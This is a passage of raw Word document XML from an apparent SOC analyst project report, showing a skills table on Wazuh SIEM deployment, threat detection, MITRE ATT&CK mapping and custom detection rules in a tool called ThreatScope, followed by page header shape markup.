              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0FFF0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76D2412B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MD5 + SHA-256 hash of every analyzed file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="3FFFC7A9" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8F5E8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="586DA277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3A1A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="B0D8B0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="90C090"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00FE89F9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Full GUI + CLI mode support</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05CA590A" w14:textId="4F1B70E7" w:rsidR="00BA2BC0" w:rsidRDefault="000E505A" w:rsidP="003B4A86">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r w:rsidRPr="000E505A">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C28AEC" wp14:editId="0CF050EC">
            <wp:extent cx="6248400" cy="4132580"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1496563935" name="صورة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413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lastRenderedPageBreak/>
        <w:t>CLUSIONS &amp; SKILLS DEMONSTRATED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC67ED1" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This project successfully demonstrated a complete SOC detection and response workflow across three realistic attack scenarios. The combination of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> SIEM for real-time endpoint monitoring and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for deep log analysis provides layered detection coverage that mirrors enterprise-grade security operations.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1080EB02" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FFBFBE1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Skill Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B2A"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60FACC6A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</w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="044BFFD5" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3CC45FCD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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SIEM Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="549C1E87" w14:textId="46B7A5F0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 xml:space="preserve">Deployed and configured </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> with live agent monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="019C5F7A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72A2393C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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Threat Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="547AAF1A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Detected SSH brute force, PowerShell abuse, and privilege escalation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="01260E2E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6707756E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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Log Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2430D9F3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Analyzed 17,000+ log lines using custom detection engine (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ThreatScope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</w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="59BF7715" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BFAB874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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C830764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Mapped 12 techniques across 6 tactics from real attack data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="02D327CF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="21484A6E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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Threat Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D5C23B7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Generated STIX 2.1 bundles and extracted 57+ IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="075CCC09" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79AADB48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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Incident Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AAB4402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Documented triage, impact assessment, and remediation per scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="776D0118" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E0C1771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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Detection Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00EBF6F0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 xml:space="preserve">Built and applied 144 custom detection rules in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="2AD31E66" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BCFE07F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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Linux/Windows Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60E42101" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Configured VMs, networking, agents, and log collection pipelines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C11FC43" w14:textId="56591006" w:rsidR="00BA2BC0" w:rsidRDefault="003B4A86" w:rsidP="003B4A86">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidR="00000000" w:rsidRPr="003B4A86">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Report produced by Mohamed Sabry (0xSABRY) | SOC Analyst | DFIR | March 2026</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00BA2BC0">
      <w:headerReference w:type="even" r:id="rId23"/>
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:headerReference w:type="first" r:id="rId25"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1408" w:right="1200" w:bottom="7387" w:left="1200" w:header="120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32899" w14:textId="77777777" w:rsidR="00153449" w:rsidRDefault="00153449">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="461CC459" w14:textId="77777777" w:rsidR="00153449" w:rsidRDefault="00153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E263A" w14:textId="77777777" w:rsidR="00153449" w:rsidRDefault="00153449">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="363517C1" w14:textId="77777777" w:rsidR="00153449" w:rsidRDefault="00153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85D28" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1200" w:right="6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9F0C18B" wp14:editId="643DBD52">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>800100</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>762000</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6172200" cy="330200"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="15476" name="Group 15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330200"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6172200" cy="330200"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="15477" name="Shape 15477"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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78" name="Shape 15478"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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476" style="width:486pt;height:26pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:63pt;mso-position-vertical-relative:page;margin-top:60pt;" coordsize="61722,3302">
              <v:shape id="Shape 15477" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c"/>
              </v:shape>
              <v:shape id="Shape 15478" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c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C3100" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0">
    <w:pPr>
      <w:spacing w:after="160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8155" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00BA2BC0">
    <w:pPr>
      <w:spacing w:after="160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D5B2B" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1200" w:right="6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F94EC19" wp14:editId="7F3257D7">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>800100</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>762000</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6172200" cy="330200"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="15498" name="Group 154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330200"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6172200" cy="330200"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="15499" name="Shape 15499"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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00" name="Shape 15500"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
                              </a:cubicBez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A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498" style="width:486pt;height:26pt;position:absolute;mso-position-horizontal-relative:page;mso-position-horizontal:absolute;margin-left:63pt;mso-position-vertical-relative:page;margin-top:60pt;" coordsize="61722,3302">
              <v:shape id="Shape 15499" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c"/>
              </v:shape>
              <v:shape id="Shape 15500" style="position:absolute;width:61722;height:3302;left:0;top:0;" coordsize="6172200,330200" path="m50800,0l6121400,0c6149482,0,6172200,22718,6172200,50800l6172200,279400c6172200,307482,6149482,330200,6121400,330200l50800,330200c22718,330200,0,307482,0,279400l0,50800c0,22718,22718,0,50800,0x">
                <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                <v:fill on="true" color="#1a3a5c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D3587" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="-1200" w:right="6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960CE5D" wp14:editId="21D997FC">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>800100</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>762000</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6172200" cy="330200"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="15491" name="Group 154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330200"/>
                        <a:chOff x="0" y="0"/>
                        <a:chExt cx="6172200" cy="330200"/>
                      </a:xfrm>
                    </wpg:grpSpPr>
                    <wps:wsp>
                      <wps:cNvPr id="15492" name="Shape 15492"/>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6172200" cy="33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0" h="330200">
                              <a:moveTo>
                                <a:pt x="50800" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="6121400" y="0"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6149482" y="0"/>
                                <a:pt x="6172200" y="22718"/>
                                <a:pt x="6172200" y="50800"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="6172200" y="279400"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="6172200" y="307482"/>
                                <a:pt x="6149482" y="330200"/>
                                <a:pt x="6121400" y="330200"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="50800" y="330200"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="22718" y="330200"/>
                                <a:pt x="0" y="307482"/>
                                <a:pt x="0" y="279400"/>
